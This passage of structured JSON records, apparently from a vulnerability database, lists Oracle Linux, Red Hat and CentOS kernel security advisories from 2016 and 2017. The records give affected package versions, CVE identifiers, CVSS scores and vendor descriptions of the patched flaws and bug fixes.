Indi) [Orabug: 22307286] {CVE-2015-8374}\n- Btrfs: fix file corruption and data loss after cloning inline extents (Divya Indi) [Orabug: 22307286] {CVE-2015-8374}\n- netfilter: x_tables: make sure e->next_offset covers remaining blob size (Florian Westphal) [Orabug: 24682073] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian Westphal) [Orabug: 24682071] {CVE-2016-4997} {CVE-2016-4998}\n[2.6.39-400.284.1]\n- rds: schedule local connection activity in proper workqueue (Ajaykumar Hotchandani) [Orabug: 22819661] \n- ib_core: make wait_event uninterruptible in ib_flush_fmr_pool() (Avinash Repaka) [Orabug: 24525022] \n- net/mlx4: Support shutdown() interface (Ajaykumar Hotchandani) [Orabug: 24616261] ", "edition": 3, "reporter": "Oracle", "published": "2016-09-22T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-8374", "CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-09-22T00:00:00", "id": "ELSA-2016-3618", "href": "http://linux.oracle.com/errata/ELSA-2016-3618.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:48:25", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.5-3.el6", "arch": "x86_64", "packageFilename": "dtrace-modules-3.8.13-118.11.2.el6uek-0.4.5-3.el6.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-118.11.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.11.2.el7uek", "arch": "src", "packageFilename": "kernel-uek-3.8.13-118.11.2.el7uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.11.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-3.8.13-118.11.2.el7uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.11.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-3.8.13-118.11.2.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.5-3.el7", "arch": "src", "packageFilename": "dtrace-modules-3.8.13-118.11.2.el7uek-0.4.5-3.el7.src.rpm", "packageName": "dtrace-modules-3.8.13-118.11.2.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.5-3.el7", "arch": "x86_64", "packageFilename": "dtrace-modules-3.8.13-118.11.2.el7uek-0.4.5-3.el7.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-118.11.2.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.5-3.el6", "arch": "src", "packageFilename": "dtrace-modules-3.8.13-118.11.2.el6uek-0.4.5-3.el6.src.rpm", "packageName": "dtrace-modules-3.8.13-118.11.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.11.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-3.8.13-118.11.2.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.11.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-3.8.13-118.11.2.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.11.2.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-3.8.13-118.11.2.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.11.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-3.8.13-118.11.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.11.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-3.8.13-118.11.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.11.2.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-3.8.13-118.11.2.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.11.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-3.8.13-118.11.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.11.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-3.8.13-118.11.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.11.2.el6uek", "arch": "src", "packageFilename": "kernel-uek-3.8.13-118.11.2.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.11.2.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-3.8.13-118.11.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.11.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-3.8.13-118.11.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}], "description": "kernel-uek\n[3.8.13-118.11.2]\n- Btrfs: fix truncation of compressed and inlined extents (Ashish Samant) [Orabug: 22307285] {CVE-2015-8374}\n- Btrfs: fix file corruption and data loss after cloning inline extents (Divya Indi) [Orabug: 22307285] {CVE-2015-8374}\n- netfilter: x_tables: make sure e->next_offset covers remaining blob size (Florian Westphal) [Orabug: 24682074] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian Westphal) [Orabug: 24682074] {CVE-2016-4997} {CVE-2016-4998}\n[3.8.13-118.11.1]\n- rds: schedule local connection activity in proper workqueue (Ajaykumar Hotchandani) [Orabug: 24624195] \n- ib_core: make wait_event uninterruptible in ib_flush_fmr_pool() (Avinash Repaka) [Orabug: 24655952] \n- net/mlx4: Support shutdown() interface (Gavin Shan) [Orabug: 24624181] ", "edition": 3, "reporter": "Oracle", "published": "2016-09-22T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-8374", "CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-09-22T00:00:00", "id": "ELSA-2016-3617", "href": "http://linux.oracle.com/errata/ELSA-2016-3617.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T19:43:17", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.32-642.13.1.el6.i686.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection. (CVE-2016-6828, Moderate)\n\nBug Fix(es):\n\n* When parallel NFS returned a file layout, a kernel crash sometimes occurred. This update removes the call to the BUG_ON() function from a code path of a client that returns the file layout. As a result, the kernel no longer crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash on a Nonmaskable Interrupt (NMI) that was injected from the host, this VM became unresponsive and did not create the vmcore dump file. This update applies a set of patches to the Virtual Machine Bus kernel driver (hv_vmbus) that fix this bug. As a result, the VM now first creates and saves the vmcore dump file and then reboots. (BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache occasionally showed incorrect values. This update fixes the DST_NOCOUNT mechanism, and the IPv6 routing cache now shows correct values. (BZ#1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet (FCoE) stack, suboptimal performance in some cases occurred on systems with a large number of CPUs. This update fixes the fc_exch_alloc() function to try all the available exchange managers in the list for an available exchange ID. This change avoids failing allocations, which previously led to the host busy status. (BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution automatically. Consequently, users were not able to change the resolution by manual setting of the kernel's 'vga=' parameter in the /boot/grub/grub.conf file. This update adds the 'nomodeset' parameter, which can be set in the /boot/grub/grub.conf file. The 'nomodeset' parameter allows the users to prevent the vmwgfx driver from loading. As a result, the setting of the 'vga=' parameter works as expected, in case that vmwgfx does not load. (BZ#1392875)\n\n* When Red Hat Enterprise Linux 6.8 was booted on SMBIOS 3.0 based systems, Desktop Management Interface (DMI) information, which is referenced by several applications, such as NEC server's memory RAS utility, was missing entries in the sysfs virtual file system. This update fixes the underlying source code, and sysfs now shows the DMI information as expected. (BZ#1393464)\n\n* Previously, bonding mode active backup and the propagation of the media access control (MAC) address to a VLAN interface did not work in Red Hat Enterprise Linux 6.8, when the fail_over_mac bonding parameter was set to fail_over_mac=active. With this update, the underlying source code has been fixed so that the VLANs continue inheriting the MAC address of the active physical interface until the VLAN MAC address is explicitly set to any value. As a result, IPv6 EUI64 addresses for the VLAN can reflect any changes to the MAC address of the physical interface, and Duplicate Address Detection (DAD) behaves as expected. (BZ#1396479)", "reporter": "RedHat", "published": "2017-01-10T21:12:05", "type": "redhat", "title": "(RHSA-2017:0036) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-4998", "CVE-2016-6828", "CVE-2016-7117"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:07", "id": "RHSA-2017:0036", "href": "https://access.redhat.com/errata/RHSA-2017:0036", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:43:24", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-514.rt56.210.el6rt", "arch": "src", "packageName": "kernel-rt", "packageFilename": "kernel-rt-3.10.0-514.rt56.210.el6rt.src.rpm", "operator": "lt"}], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nThe kernel-rt packages have been upgraded to version 3.10.0-514, which provides a number of security and bug fixes over the previous version. (BZ#1400193)\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection. (CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of sctp protocol in which a remote attacker can trigger an out of bounds read with an offset of up to 64kB. This may panic the machine with a page-fault. (CVE-2016-9555, Moderate)\n\nBug Fix(es):\n\n* Previously, console warnings from the real-time kernel were generated when a sleeping lock was acquired in atomic context. With this update, the code has been modified to not acquire a sleeping lock in this context. As a result, the console warnings are no longer generated. (BZ#1378982)\n\n* Previously, the device mapper (DM) subsystem was not notified that the real-time kernel changes the way preemption works with spinlocks. This caused a kernel panic when the dm-multipath kernel module was loaded because the interrupt request (IRQ) check was invalid on the real-time kernel. This check has been corrected enabling the system to boot correctly with the dm-multipath module enabled. (BZ#1400305)\n\n* Previously, the kernel could sometimes panic due to a possible division by zero in the scheduler. This bug has been fixed by defining a new div64_ul() division function and correcting the affected calculation in the proc_sched_show_task() function. (BZ#1400975)\n\n* Unlike the standard Linux kernel, the real-time kernel does not disable interrupts inside the Interrupt Service Routines driver. Because of this difference, a New API (NAPI) function for turning interrupt requests (IRQ) off was actually being called with IRQs enabled. Consequently, the NAPI poll list was being corrupted, causing improper networking card operation and potential kernel hangs. With this update, the NAPI function has been corrected to force modifications of the poll list to be protected allowing proper operation of the networking card drivers. (BZ#1401779)\n\nEnhancement(s):\n\n* With this update, the CONFIG_SLUB_DEBUG and CONFIG_SLABINFO kernel configuration options are enabled in the real-time kernel. These options turn on SLUB allocator debugging and slab information tracking, which are helpful when investigating kernel memory allocation problems. (BZ#1357997)", "reporter": "RedHat", "published": "2017-01-17T22:39:19", "type": "redhat", "title": "(RHSA-2017:0113) Important: kernel-rt security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6828", "CVE-2016-7117", "CVE-2016-9555"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:58:24", "id": "RHSA-2017:0113", "href": "https://access.redhat.com/errata/RHSA-2017:0113", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:43:34", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.rt56.429.el7", "arch": "src", "packageName": "kernel-rt", "packageFilename": "kernel-rt-3.10.0-514.6.1.rt56.429.el7.src.rpm", "operator": "lt"}], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection. (CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of sctp protocol in which a remote attacker can trigger an out of bounds read with an offset of up to 64kB. This may panic the machine with a page-fault. (CVE-2016-9555, Moderate)\n\nBug Fix(es):\n\n* The kernel-rt packages have been upgraded to the 3.10.0-514.6.1 source tree, which provides a number of bug fixes over the previous version. (BZ#1401863)\n\n* Previously, the device mapper (DM) subsystem was not notified that the real-time kernel changes the way preemption works with spinlocks. This caused a kernel panic when the dm-multipath kernel module was loaded because the interrupt request (IRQ) check was invalid on the real-time kernel. This check has been corrected enabling the system to boot correctly with the dm-multipath module enabled. (BZ#1400930)\n\n* Unlike the standard Linux kernel, the real-time kernel does not disable interrupts inside the Interrupt Service Routines driver. Because of this difference, a New API (NAPI) function for turning interrupt requests (IRQ) off was actually being called with IRQs enabled. Consequently, the NAPI poll list was being corrupted, causing improper networking card operation and potential kernel hangs. With this update, the NAPI function has been corrected to force modifications of the poll list to be protected allowing proper operation of the networking card drivers. (BZ#1402837)", "reporter": "RedHat", "published": "2017-01-17T20:24:41", "type": "redhat", "title": "(RHSA-2017:0091) Important: kernel-rt security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6828", "CVE-2016-7117", "CVE-2016-9555"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-03-19T16:29:53", "id": "RHSA-2017:0091", "href": "https://access.redhat.com/errata/RHSA-2017:0091", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:45", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.6.1.el7", "arch": "ppc64", "packageName": "kernel", "packageFilename": "kernel-3.10.0-514.6.1.el7.ppc64.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous bug fixes, some of which you can see below. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/articles/2857831.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection. (CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of the SCTP protocol. A remote attacker could trigger an out-of-bounds read with an offset of up to 64kB potentially causing the system to crash. (CVE-2016-9555, Moderate)\n\nBug Fix(es):\n\n* Previously, the performance of Internet Protocol over InfiniBand (IPoIB) was suboptimal due to a conflict of IPoIB with the Generic Receive Offload (GRO) infrastructure. With this update, the data cached by the IPoIB driver has been moved from a control block into the IPoIB hard header, thus avoiding the GRO problem and the corruption of IPoIB address information. As a result, the performance of IPoIB has been improved. (BZ#1390668)\n\n* Previously, when a virtual machine (VM) with PCI-Passthrough interfaces was recreated, a race condition between the eventfd daemon and the virqfd daemon occurred. Consequently, the operating system rebooted. This update fixes the race condition. As a result, the operating system no longer reboots in the described situation. (BZ#1391611)\n\n* Previously, a packet loss occurred when the team driver in round-robin mode was sending a large number of packets. This update fixes counting of the packets in the round-robin runner of the team driver, and the packet loss no longer occurs in the described situation. (BZ#1392023)\n\n* Previously, the virtual network devices contained in the deleted namespace could be deleted in any order. If the loopback device was not deleted as the last item, other netns devices, such as vxlan devices, could end up with dangling references to the loopback device. Consequently, deleting a network namespace (netns) occasionally ended by a kernel oops. With this update, the underlying source code has been fixed to ensure the correct order when deleting the virtual network devices on netns deletion. As a result, the kernel oops no longer occurs under the described circumstances. (BZ#1392024)\n\n* Previously, a Kabylake system with a Sunrise Point Platform Controller Hub (PCH) with a PCI device ID of 0xA149 showed the following warning messages during the boot:\n\n \"Unknown Intel PCH (0xa149) detected.\"\n \"Warning: Intel Kabylake processor with unknown PCH - this hardware has not undergone testing by Red Hat and might not be certified. Please consult https://hardware.redhat.com for certified hardware.\"\n\nThe messages were shown because this PCH was not properly recognized. With this update, the problem has been fixed, and the operating system now boots without displaying the warning messages. (BZ#1392033)\n\n* Previously, the operating system occasionally became unresponsive after a long run. This was caused by a race condition between the try_to_wake_up() function and a woken up task in the core scheduler. With this update, the race condition has been fixed, and the operating system no longer locks up in the described scenario. (BZ#1393719)", "reporter": "RedHat", "published": "2017-01-17T20:24:29", "type": "redhat", "title": "(RHSA-2017:0086) Important: kernel security, bug fix, and enhancement update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6828", "CVE-2016-7117", "CVE-2016-9555"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-12T03:33:13", "id": "RHSA-2017:0086", "href": "https://access.redhat.com/errata/RHSA-2017:0086", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:43:56", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.69.1.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-220.69.1.el6.src.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)", "reporter": "RedHat", "published": "2017-01-31T17:36:14", "type": "redhat", "title": "(RHSA-2017:0215) Important: kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-01-31T17:39:51", "id": "RHSA-2017:0215", "href": "https://access.redhat.com/errata/RHSA-2017:0215", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:45:47", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-504.56.1.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-504.56.1.el6.src.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)", "reporter": "RedHat", "published": "2017-01-31T17:36:38", "type": "redhat", "title": "(RHSA-2017:0216) Important: kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-01-31T17:41:28", "id": "RHSA-2017:0216", "href": "https://access.redhat.com/errata/RHSA-2017:0216", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:14", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.18-417.el5.i686.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating\nsystem.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allows remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)\n\nBug Fix(es):\n\n* Previously, guest virtual machines (VMs) on a Hyper-V server cluster got in\nsome cases rebooted during the graceful node failover test, because the host\nkept sending heartbeat packets independently of guests responding to them. This\nupdate fixes the bug by properly responding to all the heartbeat messages in the\nqueue, even if they are pending. As a result, guest VMs no longer get rebooted\nunder the described circumstances. (BZ#1391167)\n", "reporter": "RedHat", "published": "2016-12-20T05:00:00", "type": "redhat", "title": "(RHSA-2016:2962) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:56:50", "id": "RHSA-2016:2962", "href": "https://access.redhat.com/errata/RHSA-2016:2962", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:42:54", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.76.1.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-358.76.1.el6.src.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)", "reporter": "RedHat", "published": "2017-01-26T15:05:21", "type": "redhat", "title": "(RHSA-2017:0196) Important: kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-01-26T15:07:42", "id": "RHSA-2017:0196", "href": "https://access.redhat.com/errata/RHSA-2017:0196", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:45:00", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.77.1.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-431.77.1.el6.src.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)", "reporter": "RedHat", "published": "2017-01-17T12:27:02", "type": "redhat", "title": "(RHSA-2017:0065) Important: kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-01-17T12:30:53", "id": "RHSA-2017:0065", "href": "https://access.redhat.com/errata/RHSA-2017:0065", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:45:32", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "3.10.0-229.48.1.ael7b", "arch": "ppc64le", "packageName": "kernel", "packageFilename": "kernel-3.10.0-229.48.1.ael7b.ppc64le.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)\n\nBug Fix(es):\n\n* Previously, an XFS corruption in some cases occurred on Seagate 8TB drive based volumes after a planned system shutdown or reboot, when a disk write back cache was used. With this update, the megaraid_sas driver has been fixed and the XFS corruption no longer occurs in the described scenario. (BZ#1398177)\n\n* Previously, booting a kdump kernel in some cases failed with this error:\n\n Kernel panic - not syncing: Watchdog detected hard LOCKUP on CPU 0.\n\nThis update ensures that the hpet timer software counters, including hpet_default_delta and hpet_t1_cmp, are initialized before an interrupt request is registered, and the kdump kernel now boots without the mentioned error message. (BZ#1404180)", "reporter": "RedHat", "published": "2017-02-15T07:48:51", "type": "redhat", "title": "(RHSA-2017:0270) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-02-25T03:44:49", "id": "RHSA-2017:0270", "href": "https://access.redhat.com/errata/RHSA-2017:0270", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:26:56", "references": ["https://rhn.redhat.com/errata/RHSA-2017-0036.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-642.13.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-2.6.32-642.13.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-642.13.1.el6", "arch": "noarch", "packageName": "kernel-abi-whitelists", 